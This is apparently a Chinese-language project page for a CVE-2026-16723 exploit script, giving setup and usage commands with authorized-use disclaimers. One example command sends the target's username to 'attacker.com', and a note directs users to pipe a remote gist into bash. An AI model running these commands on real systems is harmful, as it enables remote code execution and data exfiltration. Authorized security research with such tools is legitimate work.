返回更新列表
已更新Aug 2, 2026

CVE-2026-16723 — 已更新!

CVE-2026-16723

分享

CVE-2026-16723

捐赠

请通过 PayPal 或扫描下方二维码来支持本项目的维护。

paypal

捐赠二维码

⚡ 简单用法

请仅在安全且已获授权的环境中使用本项目,例如:

  • 本地虚拟机
  • Docker 容器
  • 隔离的实验室环境
  • 已获授权的渗透测试环境

示例设置:

git clone https://github.com/HORKimhab/CVE-2026-16723
cd CVE-2026-16723

# Download fastjson JAR (optional - script will auto-download)
wget https://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.83/fastjson-1.2.83.jar

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

示例用法:

# Basic exploit
python CVE-2026-16723.py -t http://localhost:8080/parse

# Custom command
python CVE-2026-16723.py -t http://localhost:8080/parse -c "id > /tmp/result"

# With custom IP and port
python CVE-2026-16723.py -t http://localhost:8080/parse -c "whoami" --remote-ip 192.168.1.100 --port 9000

# HTTPS target
python CVE-2026-16723.py -t https://target.com/api/parse -c "curl http://attacker.com/$(whoami)" --insecure

# Using proxy
python CVE-2026-16723.py -t http://localhost:8080/parse --proxy http://127.0.0.1:8080

# Custom FD range
python CVE-2026-16723.py -t http://localhost:8080/parse --fd-range 10-50

# Quiet mode
python CVE-2026-16723.py -t http://localhost:8080/parse --quiet

注意:

  • 从其他项目克隆时,你必须运行 curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y 来清除嵌套目录中的 .git
  • 例如:cve-2025-46822.sh、cve-2025-46822-lab.sh 等

致谢或参考


📚 教育性安全研究仓库

一个用于在受控环境中学习、测试和研究网络安全概念的仓库。


⚠️ 安全与法律免责声明

目的

本仓库仅用于教育及已获授权的安全研究

它旨在帮助用户了解:

  • 安全漏洞
  • 沙箱与隔离概念
  • 安全编码与防御实践

仅限授权使用

请仅在您拥有许可的环境中使用本仓库,例如:

  • 个人实验室或虚拟机
  • Docker 或隔离环境
  • 已获授权的渗透测试
  • 网络安全培训或学术研究

严禁未经授权或非法使用。


免责条款

作者和贡献者不承担因本项目造成的任何损害、滥用、法律问题或损失的责任。

使用本仓库即表示您同意:

  • 您对自己的行为负责
  • 您将合法且合乎道德地使用它
  • 本项目不提供任何担保

道德使用

本项目旨在用于:

  • 防御性安全研究
  • 网络安全教育
  • 漏洞意识提升
  • 安全的系统与软件研究

请遵循负责任披露实践,并遵守所有适用法律。


联系方式

如需进行负责任披露或合作,请通过 GitHub 联系仓库维护者。

分类